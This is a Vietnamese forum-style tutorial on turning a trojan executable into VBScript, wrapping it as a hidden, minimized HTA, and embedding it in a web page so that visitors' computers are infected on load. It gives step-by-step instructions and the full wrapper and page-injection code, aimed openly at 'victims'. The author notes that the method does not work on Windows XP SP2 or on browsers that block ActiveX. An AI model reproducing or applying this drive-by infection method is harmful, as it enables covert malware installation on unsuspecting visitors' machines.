Bài viết này sẽ hướng dẫn các bạn convert file trojan sang mã vbscript ! Từ đó đưa lên website và tiến hành lây nhiễm xuống các pc truy cập ...
Cơ chế chạy các đoạn vbscript cũng giống như các đoạn mã các website dùng để tự động set homepage, tuy nhiên nó không sử dụng được cho hệ điều hành xp sp2 hoặc trình duyệt đã khóa activeX !
Đầu tiên các bạn sử dụng EXE2VBS để convert file trojan của mình ( chẳng hạn tôi sẽ xài 1 con MagicPS ), click vào file trojan kéo vô khung exe của exe2vbs ===> các bạn sẽ được 1 file *.js ! Okie giờ edit lại một chút để thành file hta ( định dạng html thực thi để chạy các activeX ) Chú ý khi chạy exe2vbs trong phần lực chọn có 3 ô các bạn đánh dấu vào 2 mục trên thôi
Mở file trojan.exe.js vừa convert ra bằng notepad or wordpad, cho thêm dòng
Code:
<script language=vbs>
vào trên cùng
Xuống dưới cùng thay dòng: WScript.CreateObject("WScript.Shell").run(pth)
bằng
- Code:
-
Set Shell1 = CreateObject("WScript.Shell")
Shell1.Run(pth)
</script>
<HTA:APPLICATION WINDOWSTATE='minimize' SHOWINTASKBAR='no' />
</head>
<body onload='window.close()'>
</body>
</html>
Sau đó save lại thành file trojan.hta Sau đó mở file web ra thêm code này vào để run file trojan.hta
Code:
<center>
<span datasrc="#oRun" datafld="view" dataformatas="html"></span>
<xml id="oRun">
<preview>
<view>
<![CDATA[
<object id="oFile" data="trojan.hta?id=1"></object>
]]>
</view>
</preview>
</xml>
</center>
</body>
</html>
File htm này sẽ là file để victim truy cập ! Chúc thành công
Phương pháp này thực ra không mới ( bạn có thể sử dụng 1 code hta để tự động set homepage, thay đổi cấu hình mặc định của pc, tự động download file về máy tính ... ) tuy nhiên việc tự động run các ActiveX này không còn thực hiện được với XP Sp2 nữa rồi !